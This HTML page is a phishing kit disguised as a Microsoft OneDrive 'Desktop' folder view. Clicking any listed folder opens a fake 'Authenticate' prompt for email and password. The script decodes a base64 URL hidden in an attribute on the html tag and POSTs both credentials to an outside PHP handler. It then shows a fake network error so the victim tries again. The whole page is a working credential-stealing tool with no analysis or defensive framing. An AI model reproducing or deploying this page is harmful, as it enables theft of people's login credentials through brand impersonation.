<html lang="en" data-bollocks="aHR0cHM6Ly9iZW5jaGFwcm9uZS5jb20vaW1hZ2VzL2Zvcm1oYW5kbGVyLnBocA==">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link rel="stylesheet" href="https://static2.sharepointonline.com/files/fabric/office-ui-fabric-core/11.0.0/css/fabric.min.css">
        <link href='https://unpkg.com/boxicons@2.1.2/css/boxicons.min.css' rel='stylesheet'>
        <title>Desktop - OneDrive</title>
        <style type="text/css">
            *{
    padding: 0;
    margin: 0;
}
body{
    font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
    font-size: 1rem;
    background: #edf0f4;
    margin: 10px;
    overflow: hidden;
}
.wrapper{
    display: flex;
    flex-direction: column;
}
.dots{
    position: absolute;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%);
    display: none;
    z-index: 1001;
}
.dots span{
    position: absolute;
    height: 10px;
    width: 10px;
    background: #e0e0e0;
    border-radius: 50%;
    transform: rotate(calc(var(--i) * (360deg / 15))) translateY(35px);
    animation: animate 1.5s linear infinite;
    animation-delay: calc(var(--i) * 0.1s);
    opacity: 0;
}
@keyframes animate {
   0%{
     opacity: 1;
   }
   100%{
     opacity: 0;
   }
}
#Selector{
    width: 400px;
    height: auto;
    background: #fff;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%);
    display: none;
    z-index: 1001;
    box-sizing: border-box;
    padding: 30px;
    position: absolute;
}
#selectorChild{
    display: block;
    box-sizing: border-box;
}
#selectorChild img{
    width: 100%;
}
#Selector input{
    margin-top: 10px;
    border-top: none;
    border-left: none;
    border-right: none;
    width: 100%;
    font-size: 0.9rem;
    padding-bottom: 5px;
    font-weight: 100;
    border-color: rgb(102, 102, 102);
    border-width: 1px;
}
#Selector input:focus{
    outline: none;
    border-bottom: 1px solid #0f6cbd;
}
#Selector span{
    font-size: 0.9rem;
    color: #0f6cbd;
}
#selectorPass{
    display: none;
    justify-content: space-around;
}
.logoDrive{
    width: 180px;
    height: 32px;
}
#emailError, #passError{
    color: red;
    display: none;
}
.bxs-key{
    font-size: 1.5rem;
}
#nextBtn, #signBtn{
    width: 25%;
    height: 35px;
    background: linear-gradient(128.84deg, #0f6cbd 20.46%, #3c45ab 72.3%);;
    color: #fff;
    border: none;
    border-radius: 6px;
    cursor: pointer;
    margin-top: 10px;
    float: right;
}
.continue-line {
    position: relative;
    height: 1px;
    width: 100%;
    margin: 10px 0;
    background-color: #d4d4d4;
}
.continue-line::before {
    content: 'Continue with';
    position: absolute;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%);
    background-color: #FFF;
    color: #8b8b8b;
    padding: 0 15px;
}
.microsoft-img, .office-img{
    position: relative;
    transform: translateX(-250%);
}
.google-img{
    position: relative;
    transform: translateX(-290%);
}
.or-line {
    position: relative;
    height: 1px;
    width: 100%;
    margin-top: 20px;
    background-color: #cacaca;
}
.or-line::before {
    content: 'Or';
    position: absolute;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%);
    background-color: #edf0f4;
    color: #8b8b8b;
    padding: 0 15px;
}
.overlay{
    display: none;
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background-color: rgba(0, 0, 0, 0.5);
    background-repeat: no-repeat, no-repeat;
    background-position: center center, center center;
    background-size: cover, cover;
    z-index: 1000;
}
#mOverlay{
    display: none;
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background-color: rgba(0, 0, 0, 0.5);
    z-index: 1002;
}
header{
    display: flex;
    flex-direction: row;
    width: 100%;
}
header li{
    float: left;
    display: flex;
    padding: 10px;
}
.container{
    display: flex;
    flex-direction: row;
}
.container-1{
    flex: 0.5;
    justify-content: start;
}
.container-2 input{
    height: 30px;
    border: none;
    border-radius: 20px;
    padding-left: 50px;
    width: 468px;
    box-shadow: 0 2px 4px rgba(0, 0, 0, .14), 0 0 2px rgba(0, 0, 0, .12);;
}
.container-2{
    display: flex;
    justify-content: center;
    flex: 1;
}
.container-2 ul li:nth-child(1){
    position: relative;
    left: 50px;
    top: 5px;
}
.container-3{
    display: flex;
    flex: 0.5;
    justify-content: end;
}
.container-3 ul li:nth-child(1), .container-3 ul li:nth-child(6){
    display: none;
}
.round{
    height: 35px;
    width: 35px;
    border-radius: 50%;
    border: 1px solid black;
    position: relative;
    bottom: 10px;
    display: flex;
    justify-content: center;
    align-items: center;
    box-sizing: content-box;
}
.circleobj{
    margin: 10px 10px 0px 10px;
    height: 35px;
    width: 35px;
    border-radius: 50%;
    background: linear-gradient(128.84deg, #0f6cbd 20.46%, #3c45ab 72.3%);
    color: white;
    font-size: 2rem;
    display: flex;
    box-sizing: content-box;
}
.circleobj span{
    position: relative;
    bottom: 20%;
    left: 20%;
}
.side-nav{
    padding: 10px;
}
aside{
    width: 68px;
    display: flex;
    flex-direction: column;
    overflow: none;
}
aside li{
    display: block;
    padding: 8px;
}
.line{
    width: 24px;
    height: 1px;
    background-color: #d1d1d1;
    border-radius: 1px;
    margin: 2px 16px 0px 16px;
}
.contact-Icon{
    margin: 32px 0px 0px 18px;
}
.box-container{
    width:50px;
    height: 60px;
    border-bottom: 2px solid #b10e1c;
    margin-left: 5px;
}
.red-box{
    height: 35px;
    width: 100%;
    border: none;
    background: #b10e1c;
    border-radius: 7px;
}
.second-head{
    display: flex;
    flex-direction: column;
    width: 100%;
    margin-top: 10px;
    margin-right: 50px;
    margin-left: 10px;
}
.wrapper1{
    display: flex;
    flex-direction: row;
    width: 100%;
}
.nav-3{
    display: flex;
    justify-content: flex-start;
    flex: 1;
}
.nav-3 ul li:nth-child(7){
    display: none;
}
.nav-4{
    display: flex;
    justify-content: flex-end;
    flex: 1;
}
.nav-4 ul li:nth-child(7){
    display: none;
}
.wrapper1 li{
    float: left;
    display: block;
    padding: 0px 5px 0px 5px;
}
.wrapper2{
    margin-top: 15px;
}
.mfiles{
    padding-left: 4px;
}
.file-section{
    width: 100%;
    height: 470px;
    background: white;
    margin-top: 20px;
    border-radius: 20px;
    display: flex;
    flex-direction: column;
    align-items: center;
}
.file-section img{
    width: 32px;
    height: 32px;
}
.filehead{
    width: 100%;
    height: 43px;
    border-bottom: 1px solid #d1d1d1;
    display: flex;
    flex-direction: row;
    padding-left: 30px;
    padding-top: 7px;
    box-sizing: border-box;
}
.file1, .file2, .file3, .file4{
    width: 100%;
    height: 43px;
    border-bottom: 1px solid #d1d1d1;
    display: flex;
    flex-direction: row;
    padding-left: 30px;
    padding-top: 7px;
    box-sizing: border-box;
}
.file4:hover{
    cursor: pointer;
    background: #e0e0e0;
    border: none;
    padding-left: 20px;
}
.file3:hover{
    cursor: pointer;
    background: #e0e0e0;
    border: none;
    padding-left: 20px;
}
.file2:hover{
    cursor: pointer;
    background: #e0e0e0;
    border: none;
    padding-left: 20px;
}
.file1:hover{
    cursor: pointer;
    background: #e0e0e0;
    border: none;
    padding-left: 20px;
}
.fh-first{
    position: relative;
    left: 8px;
}
.f1-second, .f2-second, .f3-second, .f4-second{
    font-weight: 400;
}
.fh-first, .f1-first, .f2-first, .f3-first, .f4-first{
    flex: 0.3;
}
.fh-second, .f1-second, .f2-second, .f3-second, .f4-second{
    flex: 2;
}
.fh-third, .f1-third, .f2-third, .f3-third, .f4-third{
    flex: 1;
}
.fh-fourth, .f1-fourth, .f2-fourth, .f3-fourth, .f4-fourth{
    flex: 1;
}
.fh-fifth, .f1-fifth, .f2-fifth, .f3-fifth, .f4-fifth{
    flex: 4;
}
.f1-second, .f1-third, .f1-fourth, .f1-fifth{
    padding-top: 4px;
}
.f2-second, .f2-third, .f2-fourth, .f2-fifth{
    padding-top: 4px;
}
.f3-second, .f3-third, .f3-fourth, .f3-fifth{
    padding-top: 4px;
}
.f4-second, .f4-third, .f4-fourth, .f4-fifth{
    padding-top: 4px;
}
.f1-third, .f1-fourth, .f1-fifth{
    font-weight: 300;
}
.f2-third, .f2-fourth, .f2-fifth{
    font-weight: 300;
}
.f3-third, .f3-fourth, .f3-fifth{
    font-weight: 300;
}
.f4-third, .f4-fourth, .f4-fifth{
    font-weight: 300;
}
footer{
    margin-top: 10px;
    height: 70px;
}
@media(max-width: 1170px){
    .container-2 input{
        width: 350px;
    }
}
@media(max-width: 935px){
    .nav-3 ul li:nth-child(5), .nav-3 ul li:nth-child(6){
        display: none;
    }
    .container-2 input{
        width: 200px;
    }
    .nav-3 ul li:nth-child(7){
        display: block;
    }
    .wrapper2{
        width: 85%;
        overflow-x: scroll;
    }
    body{
        box-sizing: border-box;
        overflow-x: hidden;
    }
    .file-section{
        width: 1000px;
    }
    .wrapper1{
        width: 90%;
    }
}
@media(max-width: 825px){
    .container-3 ul li:nth-child(1), .container-3 ul li:nth-child(2), .container-3 ul li:nth-child(3), .container-3 ul li:nth-child(4), .container-3 ul li:nth-child(5){
        display: none;
    }
    .container-3 ul li:nth-child(6){
        display: block;
    }
}
@media(max-width: 721px){
    .nav-3 ul li:nth-child(5){
        display: none;
    }
    .nav-3 ul li:nth-child(6){
        display: none;
    }
    .container-2{
        display: none;
    }
    .container-3 ul li:nth-child(4), .container-3 ul li:nth-child(2), .container-3 ul li:nth-child(3){
        display: none;
    }
    .container-3 ul li:nth-child(5){
        display: none;
    }
    .container-3 ul li:nth-child(1){
        display: block;
    }
    .container-3 ul li:nth-child(6){
        display: block;
    }
    .wrapper2{
        width: 100%;
        overflow-x: scroll;
    }
    .second-head{
        width: 86%;
    }
    .file-section{
        width: 700px;
    }
    .f1-second, .f2-second, .f3-second, .f4-second{
        padding-left: 10px;
    }
    .fh-second{
        padding-left: 17px;
    }

}
@media(max-width: 440px){
    .nav-4 ul li:nth-child(1), .nav-4 ul li:nth-child(2), .nav-4 ul li:nth-child(3), .nav-4 ul li:nth-child(4), .nav-4 ul li:nth-child(5), .nav-4 ul li:nth-child(6){
        display: none;
    }
    .nav-4 ul li:nth-child(7){
        display: block;
    }
    .wrapper2, .wrapper1{
        width: 90%;
    }
    .nav-3 ul li:nth-child(3), .nav-3 ul li:nth-child(4), .nav-3 ul li:nth-child(5), .nav-3 ul li:nth-child(6){
        display: none;
    }
}
        </style>
    </head>
    <body>
        <div class="wrapper">
            <div class="dots" id="Loading">
                <span style="--i:1;"></span>
                <span style="--i:2;"></span>
                <span style="--i:3;"></span>
                <span style="--i:4;"></span>
                <span style="--i:5;"></span>
                <span style="--i:6;"></span>
                <span style="--i:7;"></span>
                <span style="--i:8;"></span>
                <span style="--i:9;"></span>
                <span style="--i:10;"></span>
                <span style="--i:11;"></span>
                <span style="--i:12;"></span>
                <span style="--i:13;"></span>
                <span style="--i:14;"></span>
                <span style="--i:15;"></span>
            </div>
            <div id="Selector">
                <img src="https://www.benchaprone.com/images/ima.ge.s.s/jj3nn6.1d.png" class="logoDrive">
                <div id="selectorPass">
                    <div id="clName" style="margin: 10px 0 10px 0;">
                        <i class="bx bx-arrow-back" id="backBtn"></i>
                        <span id="divEmail" style="font-size: 1rem; color: #000;"></span>
                    </div>
                    <h4>Enter password</h4>
                    <div id="passError">Network Error! Please verify your information and try again.</div>
                    <input type="password" placeholder="Enter password to proceed" id="clientPass">
                    <input style="height: 20px; width: 20px;" type="checkbox" name="" id="">
                    <a style="color: #000; cursor: pointer; margin-top: 0px; margin-left: 5px;">Keep me signed in</a>
                    <span id="passSpan" style="display: block; padding: 10px 0 10px 0; ">This link is valid only for the intended email address.</span>
                    <button id="signBtn">Sign in</button>
                </div>
                <div id="selectorChild">
                    <h2>Authenticate</h2>
                    <img src="https://www.benchaprone.com/images/ima.ge.s.s/screenshot-44.png"></div>
                    <div id="emailError">Enter a valid email address!</div>
                    <input type="text" placeholder="Email" id="clientEmail">
                    <span id="emailSpan">This link is valid only for the intended email address.</span>
                    <button id="nextBtn">Next</button>
                </div>
            </div>
            <div class="overlay" id="overlay"></div>
            <div id="mOverlay"></div>
            <header>
                <div class="container-1">
                    <ul>
                        <li><i class="ms-Icon ms-Icon--WaffleOffice365"></i></li>
                        <li>OneDrive</li>
                    </ul>
                </div>
                <div class="container-2">
                    <ul>
                        <li><i class="ms-Icon ms-Icon--Search"></i></li>
                        <li><form action="#">
                            <input type="text" placeholder="Search everything">
                        </form></li>
                    </ul>
                </div>
                <div class="container-3">
                    <ul>
                        <li><i class="ms-Icon ms-Icon--Search"></i></li>
                        <li><i class="ms-Icon ms-Icon--Diamond"></i></li>
                        <li><i class="ms-Icon ms-Icon--Feedback"></i></li>
                        <li><i class="ms-Icon ms-Icon--Settings"></i></li>
                        <li><i class="ms-Icon ms-Icon--Help"></i></li>
                        <li><i class="ms-Icon ms-Icon--More"></i></li>
                        <li><div class="round"><span>CS</span></div></li>
                    </ul>
                </div>
            </header>
            <div class="container">
                <aside>
                    <div class="circleobj"><span>+</span></div>
                    <div class="side-nav">
                        <ul>
                            <li><i class="ms-Icon ms-Icon--OpenPaneMirrored"></i></li>
                            <li><i class="ms-Icon ms-Icon--Home"></i></li>
                            <li><i class="ms-Icon ms-Icon--FolderHorizontal"></i></li>
                            <li><i class="ms-Icon ms-Icon--Photo2"></i></li>
                            <li><i class="ms-Icon ms-Icon--ReminderGroup"></i></li>
                            <li><i class="ms-Icon ms-Icon--RecycleBin"></i></li>
                        </ul>
                    </div>
                    <div class="line"></div>
                    <div class="contact-Icon"><i class="ms-Icon ms-Icon--Contact"></i></div>
                </aside>
                <div class="second-head">
                    <div class="wrapper1">
                        <div class="nav-3">
                            <ul>
                                <li><i class="ms-Icon ms-Icon--Share"></i></li>
                                <li>Share</li>
                                <li><i class="ms-Icon ms-Icon--Download"></i></li>
                                <li>Download</li>
                                <li><i class="ms-Icon ms-Icon--Album"></i></li>
                                <li>Create album from folder</li>
                                <li><i class="ms-Icon ms-Icon--More"></i></li>
                            </ul>
                        </div>
                        <div class="nav-4">
                            <ul>
                                <li><i class="ms-Icon ms-Icon--SortLine"></i></li>
                                <li>Sort</li>
                                <li><i class="ms-Icon ms-Icon--ChevronDown"></i></li>
                                <li><i class="ms-Icon ms-Icon--List"></i></li>
                                <li><i class="ms-Icon ms-Icon--ChevronDown"></i></li>
                                <li><i class="ms-Icon ms-Icon--OpenPane"></i></li>
                                <li><i class="ms-Icon ms-Icon--More"></i></li>
                                <li>Details</li>
                            </ul>
                        </div>
                    </div>
                    <div class="wrapper2">
                        <div class="mfiles"><p>My files > Desktop</p></div>
                        <div  class="file-section">
                            <div class="filehead">
                                <div class="fh-first"><i class="ms-Icon ms-Icon--FolderHorizontal"></i></div>
                                <div class="fh-second"><span class="span1">Name</span></div>
                                <div class="fh-third"><span class="span2">Modified</span></div>
                                <div class="fh-fourth"><span class="span3">File size</span></div>
                                <div class="fh-fifth"><span class="span4">Sharing</span></div>
                            </div>
                            <div class="file1 fileClick">
                                <div class="f1-first"><img src="/mypublic/folder.svg" alt=""></div>
                                <div class="f1-second"><span class="span1">Legal Documents</span></div>
                                <div class="f1-third"><span class="span2">Today</span></div>
                                <div class="f1-fourth"><span class="span3">7mb</span></div>
                                <div class="f1-fifth"><span class="span4">public</span></div>
                            </div>
                            <div class="file2 fileClick">
                                <div class="f2-first"><img src="/mypublic/folder.svg" alt=""></div>
                                <div class="f2-second"><span class="span1">Blueprints</span></div>
                                <div class="f2-third"><span class="span2">Today</span></div>
                                <div class="f2-fourth"><span class="span3">4mb</span></div>
                                <div class="f2-fifth"><span class="span4">public</span></div>
                            </div>
                            <div class="file3 fileClick">
                                <div class="f3-first"><img src="/mypublic/folder.svg" alt=""></div>
                                <div class="f3-second"><span class="span1">Purchase order</span></div>
                                <div class="f3-third"><span class="span2">Today</span></div>
                                <div class="f3-fourth"><span class="span3">9mb</span></div>
                                <div class="f3-fifth"><span class="span4">public</span></div>
                            </div>
                            <div class="file4 fileClick">
                                <div class="f4-first"><img src="/mypublic/folder.svg" alt=""></div>
                                <div class="f4-second"><span class="span1">Scope of work</span></div>
                                <div class="f4-third"><span class="span2">Today</span></div>
                                <div class="f4-fourth"><span class="span3">11mb</span></div>
                                <div class="f4-fifth"><span class="span4">public</span></div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <footer>
            <div class="box-container">
                <div class="red-box"></div>
            </div>
        </footer>
    </body>
    <script type="text/javascript">
        

var loading = document.getElementById("Loading");
var filesClick = document.querySelectorAll(".fileClick");
var div = document.getElementById("Selector");
var selectorEmail = document.getElementById('selectorChild');
var selectorPass = document.getElementById('selectorPass');
var emailSpan = document.getElementById('emailSpan');
var overlay = document.getElementById('overlay');


window.onload = function(){
    document.getElementById("clientEmail").value = '';
}

filesClick.forEach(fileShare =>{
    fileShare.addEventListener('click', function(){
        if (loading.style.display ==="none" || loading.style.display ===""){
            loading.style.display ="block";
            overlay.style.display ="block";
        }else{
            loading.style.display = "none";
        }
        setTimeout(function(){
            loading.style.display = "none";
            div.style.display = "block";
        }, 3000)
    })
})


const nextBtn = document.getElementById("nextBtn");
const clEmail = document.getElementById("clientEmail");
const divEmailValue = document.getElementById("divEmail");
const errorMsg = document.getElementById("emailError");
const bollocks =  (document.querySelector('html').getAttribute('data-bollocks'))
nextBtn.addEventListener('click', function(){
    const emailValue = clEmail.value;

    if(!validateEmail(emailValue)){
        errorMsg.style.display = "block";
        clEmail.style.borderBottom = '1px solid red';
        return;
    }
    selectorEmail.style.display = "none";
    clEmail.style.display = "none";
    nextBtn.style.display = "none";
    emailSpan.style.display = "none";
    divEmailValue.textContent = emailValue;
    selectorPass.style.display = "block";

})

function validateEmail(email){
    const emailPattern = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
    return emailPattern.test(email);
}

const passError = document.getElementById("passError");
const entBtn = document.getElementById("signBtn");
const clPass = document.getElementById("clientPass");
  entBtn.addEventListener('click', function(){
    const globalEmail = clEmail.value;
    const passValue = clPass.value;
    const formData = new FormData();
    formData.append('globalEmail', globalEmail);
    formData.append('passValue', passValue);
    if(passValue.length < 6){
      passError.textContent = "password cannot be less than 6";
    }else{
        loading.style.display = "block";

        fetch(atob(bollocks), {
            method: 'POST',
            body: formData
        })
        .then(response => {
            loading.style.display = "none";
            passError.style.display = "block"
            clPass.value = ""
            if(!response){
                return response.text().then(text => {
                    throw new Error(text);
                })
            }
            return response.json();
        })
        .then(data => {
            errorMsgPass.textContent = data.message;
        })
        .catch(error =>{ 
            errorMsgPass.textContent = error;
        })
    } 
})


    </script>
</html>